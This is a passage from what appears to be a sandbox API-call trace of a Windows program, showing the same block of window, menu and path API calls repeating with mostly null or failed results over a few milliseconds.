pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.423] PathFileExistsW (pszPath=0x0) returned 0 [0027.423] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.423] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.423] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.423] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.423] GetMenu (hWnd=0x0) returned 0x0 [0027.423] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x40c) returned -1 [0027.423] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.423] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.423] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.423] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.423] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.423] GetStockObject (i=6) returned 0x1b00018 [0027.423] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.423] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.423] PathFileExistsW (pszPath=0x0) returned 0 [0027.423] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.423] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.423] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.423] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.423] GetMenu (hWnd=0x0) returned 0x0 [0027.423] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.423] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.423] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.423] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.423] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.423] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.423] GetStockObject (i=6) returned 0x1b00018 [0027.423] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.423] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.423] PathFileExistsW (pszPath=0x0) returned 0 [0027.423] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.423] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.424] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.424] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.424] GetMenu (hWnd=0x0) returned 0x0 [0027.424] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.424] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.424] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.424] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.424] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.424] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.424] GetStockObject (i=6) returned 0x1b00018 [0027.424] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.424] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.424] PathFileExistsW (pszPath=0x0) returned 0 [0027.424] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.424] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.424] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.424] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.424] GetMenu (hWnd=0x0) returned 0x0 [0027.424] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.424] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.424] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.424] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.424] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.424] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.424] GetStockObject (i=6) returned 0x1b00018 [0027.424] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.424] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.424] PathFileExistsW (pszPath=0x0) returned 0 [0027.424] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.424] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.424] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.424] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.424] GetMenu (hWnd=0x0) returned 0x0 [0027.424] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.425] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.425] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.425] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.425] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.425] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.425] GetStockObject (i=6) returned 0x1b00018 [0027.425] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.425] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.425] PathFileExistsW (pszPath=0x0) returned 0 [0027.425] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.425] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.425] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.425] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.425] GetMenu (hWnd=0x0) returned 0x0 [0027.425] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x518) returned -1 [0027.425] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.425] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.425] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.425] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.425] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.425] GetStockObject (i=6) returned 0x1b00018 [0027.425] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.425] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.425] PathFileExistsW (pszPath=0x0) returned 0 [0027.425] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.425] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.425] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.425] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.425] GetMenu (hWnd=0x0) returned 0x0 [0027.425] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.425] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.425] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.425] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.426] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.426] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.426] GetStockObject (i=6) returned 0x1b00018 [0027.426] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.426] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.426] PathFileExistsW (pszPath=0x0) returned 0 [0027.426] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.426] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.426] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.426] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.426] GetMenu (hWnd=0x0) returned 0x0 [0027.426] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.426] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.426] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.426] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.426] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.426] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.426] GetStockObject (i=6) returned 0x1b00018 [0027.426] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.426] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.426] PathFileExistsW (pszPath=0x0) returned 0 [0027.426] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.426] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.426] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.426] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.426] GetMenu (hWnd=0x0) returned 0x0 [0027.426] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.426] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.426] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.426] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.426] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.426] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.426] GetStockObject (i=6) returned 0x1b00018 [0027.427] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.427] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.427] PathFileExistsW (pszPath=0x0) returned 0 [0027.427] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.427] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.427] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.427] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.427] GetMenu (hWnd=0x0) returned 0x0 [0027.427] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.427] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.427] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.427] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.427] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.427] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.427] GetStockObject (i=6) returned 0x1b00018 [0027.427] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.427] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.427] PathFileExistsW (pszPath=0x0) returned 0 [0027.427] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.427] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.427] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.427] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.427] GetMenu (hWnd=0x0) returned 0x0 [0027.427] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1f4) returned -1 [0027.427] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.427] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.427] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.427] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.427] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.427] GetStockObject (i=6) returned 0x1b00018 [0027.427] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.427] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.427] PathFileExistsW (pszPath=0x0) returned 0 [0027.427] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.427] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.428] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.428] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.428] GetMenu (hWnd=0x0) returned 0x0 [0027.428] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.428] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.428] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.428] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.428] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.428] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.428] GetStockObject (i=6) returned 0x1b00018 [0027.428] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.428] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.428] PathFileExistsW (pszPath=0x0) returned 0 [0027.428] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.428] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.428] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.428] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.428] GetMenu (hWnd=0x0) returned 0x0 [0027.428] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.428] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.428] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.428] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.428] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.428] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.428] GetStockObject (i=6) returned 0x1b00018 [0027.428] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.428] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.428] PathFileExistsW (pszPath=0x0) returned 0 [0027.428] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.428] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.429] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.429] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.429] GetMenu (hWnd=0x0) returned 0x0 [0027.429] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.429] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.429] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.429] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.429] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.429] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.429] GetStockObject (i=6) returned 0x1b00018 [0027.429] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.429] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.429] PathFileExistsW (pszPath=0x0) returned 0 [0027.429] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.429] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.429] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.429] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.429] GetMenu (hWnd=0x0) returned 0x0 [0027.429] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.429] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.429] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.429] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.429] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.429] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.429] GetStockObject (i=6) returned 0x1b00018 [0027.429] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.429] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.429] PathFileExistsW (pszPath=0x0) returned 0 [0027.429] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.429] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.429] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.429] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.429] GetMenu (hWnd=0x0) returned 0x0 [0027.430] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x29b) returned -1 [0027.430] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.430] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.430] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.430] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.430] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.430] GetStockObject (i=6) returned 0x1b00018 [0027.430] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.430] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.430] PathFileExistsW (pszPath=0x0) returned 0 [0027.430] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.430] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.430] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.430] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.430] GetMenu (hWnd=0x0) returned 0x0 [0027.430] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.430] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.430] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.430] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.430] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.430] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.430] GetStockObject (i=6) returned 0x1b00018 [0027.430] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.430] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.430] PathFileExistsW (pszPath=0x0) returned 0 [0027.430] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.430] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.430] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.430] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.430] GetMenu (hWnd=0x0) returned 0x0 [0027.430] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.430] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.430] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.430] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.431] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.431] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.431] GetStockObject (i=6) returned 0x1b00018 [0027.431] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.431] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.431] PathFileExistsW (pszPath=0x0) returned 0 [0027.431] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.431] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.431] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.431] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.431] GetMenu (hWnd=0x0) returned 0x0 [0027.431] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.431] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.431] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.431] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.431] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.431] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.431] GetStockObject (i=6) returned 0x1b00018 [0027.431] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.431] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.431] PathFileExistsW (pszPath=0x0) returned 0 [0027.431] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.431] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.431] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.431] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.431] GetMenu (hWnd=0x0) returned 0x0 [0027.431] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.431] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.431] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.431] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.431] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.431] TrackPopupMenuEx (param_1=0x0, 